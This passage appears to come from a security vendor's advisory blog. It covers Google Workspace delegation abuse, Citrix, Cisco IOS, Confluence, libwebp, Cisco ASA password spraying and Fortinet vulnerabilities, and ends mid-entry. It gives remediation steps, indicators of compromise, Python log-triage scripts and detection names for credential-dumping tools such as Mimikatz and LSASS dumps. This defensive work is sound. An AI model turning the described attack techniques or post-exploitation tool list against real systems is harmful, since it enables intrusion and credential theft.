    Scenario 1: The attacker compromises access to an already delegated Google Cloud IAM key and uses it to do bad things in Workspace. Or the attacker compromises a workspace Super Admin and delegates a key in another Google Cloud organization, since there is no domain limitation and cross organizational delegation works just fine.

    I have seen a few apps do the second option for admin management reasons. This option is generally a bad idea since cross-organization delegation is invisible from monitoring.

    Scenario 2: DeleFriend “Attack” – “Compromise an existing delegation”

    With Domain-Wide Delegation, Google only validates the key secret value and the OAuth ID (the ID attached to the Google Cloud IAM user for the key), not the key ID. Scenario 2 is really the new attack right here.

    That is, if the attacker can compromise the IAM user in Google Cloud, or have the permissions to create a different key on that same IAM user in Google Cloud, they can use a second key and the Google API to list out all the other keys, scopes (permissions), and a few more pieces of info needed to gain access into Google Workspace – all without ever needing the secret from the first key that was delegated.

    So with a second key on the same IAM user, they can use it with the right scopes and OAuth ID just like the first key.

    What does this all mean?

    Successful abuse of the Domain-Wide Delegation feature exposes sensitive data stored within Google Workspace (e.g. emails, files stored in Drive, calendar, etc.) as well as access to security and administration tools. Hunters reports that abuse of this feature by threat actors has been observed in the wild.

    Things to do when using Google Domain Wide Delegation

    Understand what scopes (permissions) you are granting to that Google Cloud IAM user. Make the permissions as minimal as possible. Use read-only scopes if you can, and never store the json keys locally once you’re done setting things up. Those secret key files xxxxx.json are a prime target for attackers, so don’t keep them around.

    Stay informed on the latest risks with practical, no-nonsense breakdowns. Follow Blumira on LinkedIn for notifications on blog posts like This Vuln.

    Critical
    November 3, 2023

    Citrix NetScaler Auth Bypass Vulnerability (CVE-2023-4966)

    What Happened?

    Security researchers at AssetNote uncovered an easily exploitable authentication bypass vulnerability when investigating Citrix patch updates related to “unauthenticated buffer-related vulnerabilities” previously reported in a Citrix security bulletin. Through a process called “patch diffing”, AssetNote was able to create a proof of concept exploit that bypassed authentication, including MFA, on unpatched systems.

    As noted by Citrix in their official security bulletin:

    The following supported versions of NetScaler ADC and NetScaler Gateway are affected by the vulnerabilities:

    • NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50
    • NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15
    • NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19
    • NetScaler ADC 13.1-FIPS before 13.1-37.164
    • NetScaler ADC 12.1-FIPS before 12.1-55.300
    • NetScaler ADC 12.1-NDcPP before 12.1-55.300

    Note: NetScaler ADC and NetScaler Gateway version 12.1 have reached end-of-life and are vulnerable.

    This bulletin only applies to customer-managed NetScaler ADC and NetScaler Gateway products. Customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication do not need to take any action. NetScaler ADC and NetScaler Gateway appliances that are not configured as a gateway (VPN virtual server, ICA proxy, CVPN, or RDP proxy) or as an AAA virtual server (traditional load balancing configurations, for example) and related products such as NetScaler Application Delivery Management (ADM) and Citrix SD-WAN are not affected.

    How Bad is This?

    If exploited, this vulnerability leaks the content of system memory to the attacker. Memory leaked in this way may contain a valid Netscaler AAA session cookie belonging to a valid, authenticated user. Using this stolen session cookie, an attacker could impersonate a user and establish a fully authenticated session with the appliance without providing a username or password. It’s important to note that this session cookie is issued post-authentication which means that MFA checks are satisfied and will not prevent an attacker from gaining access.

    Confirmed malicious activity following successful exploitation and authentication include typical post-exploitation tactics, techniques, and procedures (TTPs) such as the following:

    • Host and network reconnaissance
      • Net.exe
      • Systeminfo
      • whoami
    • Credential harvesting
      • LSASS dumps
      • Mimikatz
    • Lateral movement via RDP
    • Usage of specific tools and Windows utilities
      • 7zip
      • Certutil
      • SoftPerfect network scanner (netscan.exe)
      • csvde.exe
      • local.exe
      • nbtscan.exe
    • Deployment of RMM tools for persistence
      • Atera
      • AnyDesk
      • SplashTop

    What Should I Do?

    Remediation

    If you are running an affected version, Citrix urges administrators to apply updates immediately. Following successful patching, Citrix has also recommended ending all active and persistent sessions. This can be accomplished using the following commands:

    • kill icaconnection -all
    • kill rdp connection -all
    • kill pcoipConnection -all
    • kill aaa session -all
    • clear lb persistentSessions

    Investigation

    Tracking and identifying evidence of exploitation is difficult as Citrix appliance logs don’t appear to provide any hints or artifacts of successful exploitation. Mandiant has provided a solid list to help scope your investigation:

    • Reviewing NetScaler appliances for evidence of backdoors or web shells.
      • Mandiant has provided a tool to help identify such evidence.
    • Identifying suspicious logins / lateral movement originating from published systems or resources accessible through the NetScaler appliances.
    • Correlating authentication and login events (e.g., VDI systems published through NetScaler appliances) sourced from geographic locations that are not part of an established baseline.
    • Correlating authentication and login events where a successful MFA challenge/response was not logged.

    Detection

    Considering the lack of exploitation artifacts in the logs of the Citrix appliances themselves, it may be helpful to review the logs from network firewalls or web application firewalls deployed in front of the NetScaler appliance. Most notably, monitor traffic to these appliances from suspicious or unusual IP addresses, and abnormal requests to the appliance URL oauth/idp/.well-known/openid-configuration.

    GreyNoise is tracking suspicious IPs under the tag “Citrix ADC Netscaler CVE-2023-4966 Information Disclosure Attempt”. It should be noted that these are just IP addresses caught scanning for the vulnerability. Seeing these in your logs should not be considered a confirmation of a targeted attack or attempted exploitation.

    New Blumira detections specifically created in response to this emerging threat:

    • Detection, enabled by default – “SoftPerfect Network Scanner”: identifies processes running that are associated with the network scanning tool “Network Scanner” by SoftPerfect.
    • Detection, disabled by default – “Citrix Netscaler: Multiple SSLVPN Users from Same IP”: identifies when multiple users are using Netscaler SSLVPN from the same IP address, as advised by Mandiant.
    • Detection, disabled by default – “Citrix Netscaler: SSLVPN Mismatched Client IP and Source IP”: identifies when an SSLVPN session has a mismatched client IP and source IP, which may indicate session hijacking, as advised by Mandiant.
    • Detection, disabled by default – “Citrix Netscaler: SSLVPN Authentication Outside of US”: identifies when a user’s SSLVPN authentication occurs outside of the United States.
    • Report – “Citrix Netscaler: SSLVPN Activity by Country”: presents SSLVPN activity grouped by country. This report should help quickly and easily identify any suspicious or unexpected activity.
    • Report – “Citrix Netscaler: All SSLVPN Logins”: surfaces all logs related to user SSLVPN authentication.

    How Blumira Can Help

    Blumira detections specific to this exploit:

    • Reconnaissance via Net Commands
    • Discovery Commands Issued from Unusual Process
    • Windows Firewall: Potential RDP Scanning Activity
    • Certutil Download
    • Mimikatz Process Creation or Command Run
    • Mimikatz File Creation Artifacts
    • LSASS read with Pypykatz
    • Indicator: Password Dumper Remote Thread in LSASS
    • Dump LSASS.exe Memory using ProcDump
    • Dump LSASS.exe Memory using comsvcs.dll
    • Dump LSASS.exe Memory using Windows Task Manager
    • Remote Access Tool: Atera
    • Remote Access Tool: Splashtop
    • Remote Access Tool: AnyDesk

    It’s nearly impossible for admins to track every vulnerability, but Blumira’s security experts perform threat hunting on your behalf and develop detections in real-time to protect your environment. Blumira is actively working on a detection for QueueJumper for its customers.

    Blumira’s Free SIEM is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Sign up for free and connect to your Microsoft 365 environment in minutes to start detecting and mitigating exposure related to Windows vulnerabilities.

    Critical
    October 17, 2023

    CVE-2023-20198 – Cisco IOS Web UI Vulnerability

    What Happened?

    Cisco has published a security advisory tracking the active exploitation of a new zero-day vulnerability in the Cisco IOS Web UI. This flaw affects all versions of Cisco IOS with the HTTP Server feature enabled. It allows an external, unauthenticated attacker to create a new administrative user account with full administrative privileges (level 15 access). Cisco has reported that they have tracked attacks taking advantage of this vulnerability going back to at least September 18, 2023.

    How Bad is This?

    The ease of exploitation and scope of this attack have earned this vulnerability a CVSS score of 10, which is the highest severity. Networking devices that are susceptible to this issue include switches, routers, and wireless LAN controllers that utilize Cisco IOS XE and that have the HTTP or HTTPS server enabled and open to the public internet. Once exploited, attackers have full access to the device and can perform any actions a fully-authenticated administrator can. This kind of access has the potential to allow an attacker to perform reconnaissance on network traffic, pivot into internal networks, and perform man-in-the-middle attacks which may also lead to compromised domain user credentials. The most common follow-on activity observed by Cisco has been the deployment of an implant that allows remote execution of malicious commands at the system or IOS level.

    What Should I Do?

    Considering the CVSS score of this vulnerability and potential impact it may have on an environment, Cisco urges organizations with Cisco IOS Web UI devices exposed to the internet to immediately implement the guidance outlined in their PSIRT advisory. At this moment, there are no known workarounds nor system updates to apply to patch this vulnerability.

    Cisco recommends that you take the following steps:

    1. Disable the HTTP Server feature on all internet-facing systems. To disable the HTTP Server feature, use the no ip http server or no ip http secure-server command in global configuration mode. If both the HTTP server and HTTPS server are in use, then you must use both commands to disable the HTTP Server feature.
    2. If HTTP Server features cannot be disabled, Cisco recommends that you apply access lists to the HTTP Server feature to restrict access from untrusted hosts and networks. They have found this to be an effective mitigation strategy.
    3. If an implant is confirmed to have been installed, you can reboot the affected device to sever that connection; however, if the attacker still has access to their created account, they can always access the device again and re-implement the implant.

    How do I determine whether the HTTP Server feature is enabled?

    To determine whether the HTTP Server feature is enabled for a device, access the command line interface and run the following command:

    show running-config | include ip http server|secure|active

    If ip http server or ip http secure-server is returned, then the HTTP Server feature is enabled.

    Look for indicators of compromise

    If the HTTP Server feature was enabled on one of your devices, look for the following indicators of compromise:

    • Any activity from the following IP addresses:
      • 5.149.249[.]74
      • 154.53.56[.]231
    • Any unrecognized or unexplainable new local users created on the affected device.
      Note: cisco_tac_admin, cisco_support have been observed in confirmed exploitations.
    • Any logins or configuration changes made by any unrecognized accounts. You can narrow down your search by reviewing %SYS-5-CONFIG_P message logs. These will be present for each instance that a user has accessed the web UI.
    • Check the system logs for the following message where “filename” is an unknown filename that does not correlate with an expected file installation action:
      %WEBUI-6-INSTALL_OPERATION_INFO: User: username, Install Operation: ADD filename
    • Check systems for implants using the following commands, where “systemip” is the IP address of the Cisco device to check, including:
      • Systems configured to use HTTPS:
        curl -k -X POST "https://systemip/webui/logoutconfirm.html?logon_hash=1"
      • Systems configured to use HTTP:
        curl -k -X POST "http://systemip/webui/logoutconfirm.html?logon_hash=1"
      As indicated by Cisco, if the request returns a hexadecimal string, the implant is present.
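    Added example (not Cisco’s or Blumira’s code) that triages constructed IOS XE syslog lines against the indicators listed above and applies Cisco’s hexadecimal-response test to a captured response body. The exact wording assumed for the %SYS-5-CONFIG_P message and the EXPECTED_* allow-lists are assumptions, not values from the advisory.

```python
"""Triage Cisco IOS XE syslog and web UI responses for the CVE-2023-20198 indicators.

Added example, not Cisco's or Blumira's code. Syslog lines are constructed; the
"by process ... as <user>" wording used for %SYS-5-CONFIG_P is an assumption about
that message's layout. The EXPECTED_* allow-lists are placeholders an operator fills
from their own change records.
"""
import re

# Indicators quoted in the advisory text above ("[.]" removed so they match raw logs).
KNOWN_BAD_USERS = {"cisco_tac_admin", "cisco_support"}
KNOWN_BAD_IPS = {"5.149.249.74", "154.53.56.231"}
# Assumed allow-lists: local accounts you created and install files you actually staged.
EXPECTED_USERS = {"netops"}
EXPECTED_INSTALLS = {"approved-image.bin"}

CONFIG_P = re.compile(r"%SYS-5-CONFIG_P:.*\bas (?P<user>\S+)")
INSTALL_OP = re.compile(
    r"%WEBUI-6-INSTALL_OPERATION_INFO: User:\s*(?P<user>[^,]+),\s*"
    r"Install Operation:\s*(?P<op>\w+)\s+(?P<filename>\S+)"
)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def triage_syslog(lines):
    """Return one finding per suspicious line, each carrying the reasons it was flagged."""
    findings = []
    for line in lines:
        reasons = []
        # 1. Any activity involving the published source addresses.
        for ip in IPV4.findall(line):
            if ip in KNOWN_BAD_IPS:
                reasons.append(f"known-bad source address {ip}")
        # 2. Web UI configuration changes or installs by accounts you did not create.
        m = CONFIG_P.search(line) or INSTALL_OP.search(line)
        user = m.group("user").strip() if m else None
        if user in KNOWN_BAD_USERS:
            reasons.append(f"account seen in confirmed exploitations: {user}")
        elif user is not None and user not in EXPECTED_USERS:
            reasons.append(f"unrecognized local account: {user}")
        # 3. ADD install operations for files that do not match an expected installation.
        m = INSTALL_OP.search(line)
        if m and m.group("op") == "ADD" and m.group("filename") not in EXPECTED_INSTALLS:
            reasons.append(f"unexpected install of {m.group('filename')}")
        if reasons:
            findings.append({"line": line, "reasons": reasons})
    return findings


def implant_response_present(body):
    """Cisco's check: the logoutconfirm.html?logon_hash=1 POST answers with a hex string
    when the implant is present. True only for a non-empty, purely hexadecimal body."""
    body = body.strip()
    return bool(body) and re.fullmatch(r"[0-9a-fA-F]+", body) is not None


# Constructed syslog lines (not real captures).
SAMPLE_SYSLOG = [
    "Oct 15 2023 02:11:43 UTC: %SYS-5-CONFIG_P: Configured programmatically by process "
    "SEP_webui_wsma_http from console as cisco_tac_admin on vty0",
    "Oct 15 2023 02:12:01 UTC: %WEBUI-6-INSTALL_OPERATION_INFO: User: cisco_tac_admin, "
    "Install Operation: ADD unrecognized.bin",
    "Oct 15 2023 02:15:09 UTC: %SYS-5-CONFIG_P: Configured programmatically by process "
    "SEP_webui_wsma_http from console as netops on vty1",
    "Oct 15 2023 03:40:22 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: netops] "
    "[Source: 5.149.249.74] [localport: 22]",
    "Oct 15 2023 04:00:00 UTC: %WEBUI-6-INSTALL_OPERATION_INFO: User: netops, "
    "Install Operation: ADD approved-image.bin",
]

if __name__ == "__main__":
    for finding in triage_syslog(SAMPLE_SYSLOG):
        print(finding["reasons"], "<-", finding["line"])
```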

    How Blumira Can Help

    It’s nearly impossible for admins to track every vulnerability, but Blumira’s security experts perform threat hunting on your behalf and develop detections in real time to protect your environment. Blumira is actively working on a detection for QueueJumper for its customers.

    Blumira’s Free SIEM is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Sign up for free and connect to your Microsoft 365 environment in minutes to start detecting and mitigating exposure related to Windows vulnerabilities.

    Critical
    October 5, 2023

    CVE-2023-22515: Zero-Day Privilege Escalation in Confluence

    What Happened?

    On October 4th, 2023, Atlassian disclosed a critical severity vulnerability in Confluence Data Center and Server instances, tracked as CVE-2023-22515. The vulnerability, which received a CNA base score of 10.0, could allow remote attackers to create unauthorized administrator accounts and access Confluence instances on vulnerable Confluence servers.

    Who Is Impacted?

    The following Confluence versions are affected:

    • 8.0.0 – 8.0.4
    • 8.1.0, 8.1.3, 8.1.4
    • 8.2.0 – 8.2.3
    • 8.3.0 – 8.3.2
    • 8.4.0 – 8.4.2
    • 8.5.0 – 8.5.1

    Confluence customers using versions prior to 8.0.0 or an Atlassian-hosted Confluence instance (sites with an atlassian.net domain) are not affected by this vulnerability and therefore do not need to take any action.

    How Bad is This?

    According to Atlassian’s advisory, unauthorized Confluence administrator account creation and Confluence instance access may have already occurred on some customer systems before the CVE was announced. The potential exploitation of this vulnerability prior to its disclosure makes it a zero-day vulnerability.

    While details remain limited, an attacker who successfully exploits this vulnerability could create Confluence administrator accounts, and then do the following:

    • Access Confluence instances
    • Modify or delete Confluence data
    • Execute arbitrary code on the server

    What Should I Do?

    For administrators hosting publicly-accessible Confluence Data Center and Server instances, a critical severity vulnerability poses a severe threat that warrants urgent response. Given this severity, all impacted organizations should immediately upgrade their affected servers to a fixed version. Those who are unable to upgrade should apply the recommended interim mitigations. Affected servers should be audited for signs of compromise.

    Update to a fixed version

    Impacted customers are advised to upgrade to a fixed version of Confluence as soon as possible. The fixed versions include the following:

    • 8.3.3+
    • 8.4.3+
    • 8.5.2 (or later)

    You can download the latest version of Confluence Data Center and Confluence Server from Atlassian here.

    Mitigate if you are unable to update

    If you are unable to promptly update the server version, you can instead limit external network access to the affected server. Additional mitigations identified by Atlassian include blocking access to /setup/* endpoints on Confluence instances. This mitigation can be applied at the network layer or by modifying the server configuration by doing the following:

    1. On each node, modify the file
    /<confluence-install-dir>/confluence/WEB-INF/web.xml
    to add the following block of code. Ensure that this code block is added before the closing </web-app> tag at the end of the file.

    <security-constraint>
    <web-resource-collection>
    <url-pattern>/setup/*</url-pattern>
    <http-method-omission>*</http-method-omission>
    </web-resource-collection>
    <auth-constraint />
    </security-constraint>

    2. Restart Confluence.

    Audit for signs of compromise

    An administrator should thoroughly review affected Confluence servers to identify any signs of compromise. Review the following potential indicators of compromise (IOCs) to determine whether a security incident may have occurred:

    • Unauthorized members of the confluence-administrator group
    • Unauthorized user accounts
    • Requests to /setup/*.action in the network access logs located at <install-directory>/logs/conf_access_log<date>.log
    • An exception message in atlassian-confluence-security.log with the string /setup/setupadministrator.action.
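    As an added example, not Atlassian’s code, the following Python checks that the web.xml block from the mitigation steps above is present and actually denies access (an empty auth-constraint), and scans access-log lines for the /setup/*.action indicator from the list above. The web.xml documents and log lines are constructed, and the assumption that conf_access_log uses Tomcat’s common log layout is mine.

```python
"""Check the CVE-2023-22515 interim mitigation and audit access logs for /setup/*.action.

Added example, not Atlassian's code. The web.xml documents and access-log lines are
constructed. The log layout assumes conf_access_log uses Tomcat's common log
format (source IP first, then the quoted request line, then the status code).
"""
import re
import xml.etree.ElementTree as ET


def _local(tag):
    """Strip the Java EE namespace, if any, so tags match by local name."""
    return tag.rsplit("}", 1)[-1]


def setup_endpoints_blocked(web_xml_text):
    """True if web.xml has a <security-constraint> for /setup/* with an EMPTY <auth-constraint/>.

    An empty auth-constraint denies every role, which is what Atlassian's block relies on.
    A constraint that names a role would still let members of that role reach /setup/*.
    """
    root = ET.fromstring(web_xml_text)
    for sc in root.iter():
        if _local(sc.tag) != "security-constraint":
            continue
        patterns = [p.text.strip() for p in sc.iter()
                    if _local(p.tag) == "url-pattern" and p.text]
        auth = [a for a in sc.iter() if _local(a.tag) == "auth-constraint"]
        if "/setup/*" in patterns and auth and len(list(auth[0])) == 0:
            return True
    return False


# Quoted request line followed by the status code; the path must be a /setup/*.action.
SETUP_ACTION = re.compile(
    r'"(?P<method>[A-Z]+) (?P<path>/setup/[^ ?"]*\.action)[^"]*" (?P<status>\d{3})'
)


def find_setup_requests(log_lines):
    """Return one record per request to a /setup/*.action endpoint (the IoC named above)."""
    hits = []
    for line in log_lines:
        m = SETUP_ACTION.search(line)
        if m:
            hits.append({
                "src": line.split()[0],
                "method": m.group("method"),
                "path": m.group("path"),
                "status": int(m.group("status")),
            })
    return hits


# Constructed: web.xml with the mitigation block appended before </web-app>.
MITIGATED_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <servlet><servlet-name>example</servlet-name></servlet>
  <security-constraint>
    <web-resource-collection>
      <url-pattern>/setup/*</url-pattern>
      <http-method-omission>*</http-method-omission>
    </web-resource-collection>
    <auth-constraint />
  </security-constraint>
</web-app>"""

# Constructed: the same file without any constraint on /setup/*.
UNMITIGATED_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <servlet><servlet-name>example</servlet-name></servlet>
</web-app>"""

# Constructed: a constraint that names a role, which does NOT block the endpoints.
ROLE_ONLY_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <security-constraint>
    <web-resource-collection><url-pattern>/setup/*</url-pattern></web-resource-collection>
    <auth-constraint><role-name>confluence-administrators</role-name></auth-constraint>
  </security-constraint>
</web-app>"""

# Constructed access-log lines; only the two /setup/*.action requests are indicators.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [05/Oct/2023:14:02:11 +0000] "GET /setup/setupadministrator.action HTTP/1.1" 200 1342',
    '198.51.100.4 - - [05/Oct/2023:14:02:15 +0000] "GET /dashboard.action HTTP/1.1" 200 9876',
    '203.0.113.7 - - [05/Oct/2023:14:02:20 +0000] "POST /setup/finishsetup.action?x=1 HTTP/1.1" 302 0',
    '198.51.100.4 - - [05/Oct/2023:14:03:01 +0000] "GET /setup/images/logo.png HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    print("mitigation present:", setup_endpoints_blocked(MITIGATED_WEB_XML))
    for hit in find_setup_requests(SAMPLE_ACCESS_LOG):
        print("setup endpoint hit:", hit)
```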

    A thorough analysis of these IOCs can help confirm whether exploitation took place and determine the scope of the incident. This allows organizations to fully investigate, remediate, and improve defenses.

    How Blumira Can Help

    It’s nearly impossible for admins to track every vulnerability, but Blumira’s security experts perform threat hunting on your behalf and develop detections in real time to protect your environment. Blumira will continue to monitor this vulnerability for detection and reporting opportunities.

    If you’re not already using Blumira, our Free SIEM edition is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Additional Resources

    For more information about this vulnerability, see the following resources:

    Critical
    September 27, 2023

    CVE-2023-5129: A Critical libwebp Vulnerability

    What Happened?

    CVE-2023-5129 is a critical zero-day vulnerability recently disclosed in the libwebp library, which poses significant security risks across numerous software applications and platforms. Initially reported as CVE-2023-4863, the flaw was found in the lossless compression component of the open-source libwebp library, which is responsible for encoding and decoding WebP format images.

    Specifically, CVE-2023-5129 is a heap buffer overflow issue within the Huffman coding algorithm used for lossless compression in WebP. This vulnerability allows attackers to craft malicious WebP images, and when victims open these images, the attackers can execute arbitrary code and access sensitive user data.

    How Bad is This?

    Heap buffer overflow vulnerabilities, such as CVE-2023-5129, are critically severe, providing attackers with the capability to execute malicious code or gain unauthorized access to systems. This not only opens the door for potential system control but also data theft and malware introduction. Google has confirmed the existence of an exploit for CVE-2023-4863 in the wild, heightening the urgency and significance of addressing this security issue promptly.

    The libwebp library, which is extensively integrated into various applications and platforms, has widened the exposure and potential impact of CVE-2023-5129 considerably. The vulnerability is not restricted to affecting web browsers solely; it extends its perilous influence to any software reliant on the libwebp library. Consequently, a multitude of applications and systems operating on Linux, Android, Windows, macOS, and other platforms are under imminent threat, which underscores the necessity of immediate and vigilant protective measures.

    In short, simply looking at an image can get you hacked.

    What Should I Do?

    Users and administrators should urgently:

    • Update all software that uses the libwebp library to the latest version. This includes browsers like Google Chrome, Mozilla Firefox, Apple Safari, Microsoft Edge, and other applications like 1Password, Signal, and WhatsApp, among many others.
    • Developers and organizations that rely on the libwebp library should prioritize updating to the patched versions to protect their users.
    • As a user, ensure your system and applications are updated regularly, and always download updates from official sources to avoid falling victim to exploits targeting this vulnerability.

    The Difference Between CVE-2023-5129 and CVE-2023-4863

    The vulnerability was initially reported as CVE-2023-4863 and was inaccurately attributed solely to Google Chrome. Subsequent investigation, however, unveiled that the flaw was not exclusive to Chrome. Instead, it was fundamentally located in the libwebp library, affecting a multitude of applications and platforms beyond the browser.

    The vulnerability was later reclassified under CVE-2023-5129, which accurately identified it as a core issue within the libwebp library. This reclassification elucidated that not only Chrome but any software utilizing the libwebp library could potentially be at risk. However, it should be noted that CVE-2023-5129 has since been rejected as a duplicate. This new understanding of the flaw necessitates attention from a broader spectrum of software vendors and developers, urging them to mitigate the vulnerability in their respective products and platforms.

    How Blumira Can Help

    Identifying exploitation of CVE-2023-5129 can be challenging due to having to closely monitor affected applications for unusual activity. Implementing a proactive security solution like Blumira can simplify this process:

    1. Monitoring Application Activity – With Blumira, users and administrators can efficiently track and analyze the behavior of applications that utilize the libwebp library. Blumira’s automated detection capabilities can alert you to unexpected crashes or peculiar behaviors when WebP images are processed, serving as early indicators of potential exploitation attempts.
    2. Implementing Security Solutions – Blumira offers a robust security platform designed to identify and obstruct exploits targeting known vulnerabilities like CVE-2023-5129. By actively scanning for and blocking malicious activity, Blumira provides an additional layer of defense against attackers seeking to exploit this critical vulnerability.
    3. Integration with Antivirus and Next-Gen Antivirus Tools – Blumira seamlessly integrates with conventional antivirus and next-generation antivirus (NGAV) tools, which are crucial to providing visibility into issues like CVE-2023-5129. These integrated antivirus solutions are often the first line of defense and are adept at recognizing and mitigating the exploitation of vulnerabilities. With Blumira’s integration, users and administrators can leverage the combined strength of Blumira’s threat detection and response capabilities with the proactive protection offered by antivirus and NGAV tools to secure their digital environments effectively.

    Blumira’s Free SIEM is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Sign up for free and connect to your Microsoft 365 environment in minutes to start detecting and mitigating exposure related to Windows vulnerabilities.

    Medium
    September 7, 2023

    Increase in Password Spraying vs Cisco ASA SSL VPNs

    What Happened?

    Rapid7 has reported active exploitation of Cisco ASA SSL VPNs. This is not the result of a new CVE or vulnerability, but rather an observable increase in successful password spraying attacks against these services. Cisco has stated in their own blog that they are “aware of reports that Akira ransomware threat actors have been targeting Cisco VPNs that are not configured for multi-factor authentication to infiltrate organizations, and we have observed instances where threat actors appear to be targeting organizations that do not configure multi-factor authentication for their VPN users.”

    How Bad is This?

    In most cases, a VPN will give the authenticated user access to an organization’s internal network and infrastructure. This makes this a serious event, especially considering that the attack itself is likely automated: it requires low effort by the threat actor with potential for high returns. Successful unauthorized authentication will also provide the threat actor with valid credentials to use once they get connected to the VPN, meaning they could potentially move laterally within the network.

    Sample ASA logs containing IP addresses called out by Rapid7. This activity was over a one month period (Aug 1-31).

    What Should I Do?

    Due to the nature of password spraying and brute forcing, there is no patch to apply. The best thing to do in response is to begin applying secure, best practices:

    • Enable MFA for accounts with SSL VPN access.
    • Enforce strong password requirements and do not allow the use of default credentials.
    • Limit SSL VPN access to a specific group of users.
    • Audit existing SSL VPN permissions and remove users and groups without a business need for VPN access.
    • Enable logging of VPN events. Specific details can be found in the Cisco blog post.
      • Ensure that Logging Filters for Syslog Server are configured to send “Severity: Informational”
      • It is also important to disable “Hide username if its validity cannot be determined” on your Cisco ASA device.
      • This can be found in the ASDM GUI under Device Management -> Logging -> Syslog Setup: “Hide username if its validity cannot be determined”
      • Alternatively, you can use the command: no logging hide username
    • Monitor logs as detailed in the section below.

    How To Detect

    • Monitor VPN logs for high volumes of failed authentications, especially where the username is generic like “admin”, “guest”, “test”, “printer”, etc.
    • Rapid7 has documented a number of IP addresses associated with this activity. Blumira is constantly updating our dynamic blocklists with newly identified IP addresses.
    • Cisco has documented logcodes to monitor:
      • Login attempts with invalid username and password combinations (%ASA-6-113015)
      • RAVPN session creation (attempts) for unexpected profiles/TGs (%ASA-4-113019, %ASA-4-722041, %ASA-7-734003)
    • Blumira already has a detection in place, titled “ASA WebVPN Anomalous Access Attempts”, that will detect this activity.
    • There are two Blumira Global reports you can use to monitor this as well:
      • Cisco ASA: AAA Authentication Failure Events
        • Tracks ASA-6-113015 logcode.
      • Cisco ASA: RAVPN Session Creation Attempts
        • Tracks ASA-4-113019, ASA-4-722041, and ASA-7-734003 logcodes.
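    The monitoring guidance above (high volumes of failed authentications, generic usernames, the %ASA-6-113015 logcode) can be turned into a small detection routine. The following is an added example and not Blumira's or Cisco's own detection logic; the syslog lines it runs on are constructed for illustration, the source addresses are documentation ranges, and the thresholds and the list of "generic" usernames are assumptions you would tune for your environment.

```python
import re
from collections import Counter, defaultdict

# Constructed sample ASA syslog lines (illustrative, not taken from the article).
# 113015 = AAA authentication rejected (only emitted at Informational severity);
# the user field is only populated when "logging hide username" is disabled.
SAMPLE_LOGS = """\
Aug 02 2023 10:00:01 asa01 %ASA-6-113015: AAA user authentication Rejected : reason = User was not found : local database : user = admin : user IP = 203.0.113.5
Aug 02 2023 10:00:02 asa01 %ASA-6-113015: AAA user authentication Rejected : reason = User was not found : local database : user = guest : user IP = 203.0.113.5
Aug 02 2023 10:00:03 asa01 %ASA-6-113015: AAA user authentication Rejected : reason = Invalid password : local database : user = test : user IP = 203.0.113.5
Aug 02 2023 10:00:04 asa01 %ASA-6-113015: AAA user authentication Rejected : reason = User was not found : local database : user = printer : user IP = 203.0.113.5
Aug 02 2023 10:00:05 asa01 %ASA-6-113015: AAA user authentication Rejected : reason = Invalid password : local database : user = jsmith : user IP = 198.51.100.7
Aug 02 2023 10:00:06 asa01 %ASA-4-113019: Group = DefaultRAGroup, Username = guest, IP = 203.0.113.5, Session disconnected. Session Type: SSL, Duration: 0h:00m:01s, Bytes xmt: 0, Bytes rcv: 0, Reason: User Requested
Aug 02 2023 10:00:07 asa01 %ASA-6-113015: AAA user authentication Rejected : reason = Invalid password : local database : user = jsmith : user IP = 198.51.100.7
"""

# Usernames typical of spraying lists (assumed list; extend for your environment).
GENERIC_USERS = {"admin", "administrator", "guest", "test", "printer", "user", "root"}

# Extract the rejected username and the source IP from a 113015 message.
REJECT_RE = re.compile(
    r"%ASA-6-113015:.*?user = (?P<user>\S+) : user IP = (?P<ip>\d+\.\d+\.\d+\.\d+)"
)


def parse_rejections(log_text):
    """Return a list of (source_ip, username) for every 113015 rejection."""
    events = []
    for line in log_text.splitlines():
        m = REJECT_RE.search(line)
        if m:
            events.append((m.group("ip"), m.group("user")))
    return events


def find_spray_sources(log_text, min_failures=3, min_generic=2):
    """Flag source IPs with many failures or several distinct generic usernames.

    Thresholds are assumptions for the sample; real deployments would also
    bound them by a time window.
    """
    failures = Counter()
    users = defaultdict(set)
    for ip, user in parse_rejections(log_text):
        failures[ip] += 1
        users[ip].add(user)

    findings = {}
    for ip, count in failures.items():
        generic = users[ip] & GENERIC_USERS
        if count >= min_failures or len(generic) >= min_generic:
            findings[ip] = {
                "failures": count,
                "distinct_users": len(users[ip]),
                "generic_users": sorted(generic),
            }
    return findings


if __name__ == "__main__":
    for ip, detail in find_spray_sources(SAMPLE_LOGS).items():
        print(f"{ip}: {detail}")
```

    On the sample above, 203.0.113.5 is flagged (four failures across four generic usernames) while 198.51.100.7, with two failures for a single named user, is not; the 113019 session message is ignored by this routine and would be handled by the separate RAVPN session report mentioned above.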


    References:
    Akira Ransomware Targeting VPNs without Multi-Factor Authentication | CISCO
    Under Siege: Rapid7-Observed Exploitation of Cisco ASA SSL VPNs | Rapid7

    Critical
    June 12, 2023

    Fortinet Fortigate SSL VPN Pre-Auth RCE Vulnerability (CVE-2023-27997)

    A critical vulnerability has been discovered in multiple Fortinet Fortigate devices with SSL VPN enabled. The vulnerability, CVE-2023-27997, is a heap-based buffer overflow bug that allows unauthenticated remote code execution (RCE) on the affected system.


    What Happened?

    A critical vulnerability has been discovered in multiple Fortinet Fortigate devices with SSL VPN enabled. The vulnerability, CVE-2023-27997, is a heap-based buffer overflow bug that allows unauthenticated remote code execution (RCE) on the affected system. The flaw was discovered and reported by researchers @DDXhunter and Charles Fol (@cfreal_).

    How Bad is This?

